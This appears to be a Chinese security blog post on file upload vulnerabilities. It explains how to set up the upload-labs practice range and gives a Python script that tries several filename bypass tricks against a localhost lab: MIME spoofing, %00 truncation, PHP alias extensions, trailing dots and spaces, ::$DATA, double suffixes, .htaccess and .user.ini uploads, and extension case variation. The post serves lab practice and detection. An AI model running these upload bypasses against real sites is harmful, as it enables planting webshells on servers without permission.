web漏洞-文件上传
前言
介绍了文件上传漏洞,上传漏洞自动检测脚本。文件上传漏洞类型如下,图片来源:文件上传漏洞总结。
漏洞介绍
什么是文件上传漏洞?
文件上传漏洞指的是网站在文件上传时的安全防护做的不够,使得攻击者能够上传攻击文件到服务器上,由于能直接上传攻击文件,危害很大,因此,文件上传漏洞一般属于高危漏洞。
upload-labs靶场实践
靶场搭建
文件上传漏洞类型如上图,此处直接用upload-labs靶场进行实践,项目地址:https://github.com/c0ny1/upload-labs,靶场搭建有几个需要注意的地方。一是php版本最好按照推荐的版本来,不然有些关卡过不去,二是最好在windows环境下搭建,不然有些关卡过不去,三是如果使用docker方式搭建的话注意提供的docker镜像并未更新到最新且缺少upload文件夹,需要把项目下载下来自己重新编译搭建。
脚本编写
upload-labs靶场各个关卡实践可以参考【渗透测试】文件上传漏洞:upload-labs通关简记等网上文章。此处不多赘述。根据上传漏洞类型编写一下检测脚本。
# 脚本功能待完善
import requests
from urllib3.fields import RequestField
from urllib3 import encode_multipart_formdata
# 挂个代理方便使用burp抓包分析
proxies = {'http': 'http://127.0.0.1:8888'}
pass_num_str = "02"
url = "http://localhost:8084/Pass-"+pass_num_str+"/index.php"
# boundary='---------------------------29377857821120'
def strSort(words):
tempword = words
for i in range(2**len(words)):
int_bin = str(bin(i)).replace("0b","")
for i in range(len(words)-len(int_bin)):
int_bin = "".join(("0",int_bin))
for index, i in enumerate(int_bin):
if i=='1':
wordslst = list(words)
wordslst[index] = wordslst[index].upper()
words = "".join(wordslst)
yield words
words = tempword
def getFiledList( mime, fileName, filePath):
heards_upload_file = {
"Content-Disposition": 'form-data; name="%s"; filename="%s"' % ("upload_file", fileName),
"Content-Type": mime,
}
heards_submit = {
"Content-Disposition": 'form-data; name="%s"' % ("submit"),
}
# 此处的upload_file和submit名字在这里没用,只做标记作用,主要是heards_xxx发挥作用
upload_file_field = RequestField("upload_file", open(filePath, 'rb').read(), None, heards_upload_file)
submit_field = RequestField("submit", "上传", None, heards_submit)
field_list = [upload_file_field, submit_field]
return field_list
def getBodyAndHeader(mime="application/octet-stream", fileName="test.php", filePath="D:\\test.php"):
field_list = getFiledList(mime=mime, fileName=fileName, filePath=filePath)
body, content_type = encode_multipart_formdata(field_list)
header = {
"Host":"localhost:8084",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
"Referer":"http://localhost:8084/Pass-03/index.php",
"DNT":"1",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Content-Type":content_type,
# "Content-Type":"multipart/form-data; boundary="+m[1],
}
return body, header
def scan_orign():
print("---开始检查原始的请求---")
body,header = getBodyAndHeader()
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_mime(allowMime="image/png"):
print("---开始检查mime---")
body,header = getBodyAndHeader(mime=allowMime)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_00():
print("---开始扫描%00截断---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php%00.png")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_php_other_name():
print("---开始扫描php别名---")
php_other_name_list = ["php3", "php5" , "phtml"]
for item in php_other_name_list:
body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("php别名%s返回网页长度:%s" % (item, len(text)))
else:
print("请求出错!!!")
def scan_point():
print("---开始扫描点绕过---")
point_list = [".", ". ", ". ."]
for item in point_list:
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php"+item)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("扫描点绕过"+item+"返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_space():
print("---开始扫描空格绕过---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php ")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_data():
print("---开始扫描$DATA绕过---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".php::$DATA")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_duble_suffix():
print("---开始扫描双后缀名绕过---")
body,header = getBodyAndHeader(fileName="test"+pass_num_str+".pphphp")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_htaccess():
print("---开始扫描htaccess绕过---")
body,header = getBodyAndHeader(fileName=".htaccess", filePath="D:\\.htaccess")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_userini():
print("---开始扫描.user.ini绕过---")
body,header = getBodyAndHeader(fileName=".user.ini", filePath="D:\\.user.ini")
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("返回网页长度:%s" % (len(text)))
else:
print("请求出错!!!")
def scan_suffix_case():
print("---开始扫描后缀大小写绕过---")
for item in strSort("php"):
body,header = getBodyAndHeader(fileName="test"+pass_num_str+"."+item)
response = requests.post(url, data=body, proxies=proxies, headers=header)
text = response.text
if response.status_code==200:
print("扫描后缀大小写%s网页长度:%s" % (item, len(text)))
else:
print("请求出错!!!")
def scan_all(url):
scan_orign()
scan_mime()
scan_00()
scan_php_other_name()
scan_point()
scan_space()
scan_data()
scan_duble_suffix()
scan_htaccess()
scan_userini()
scan_suffix_case()
def run(url):
scan_all(url)
if __name__ == '__main__':
run(url)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
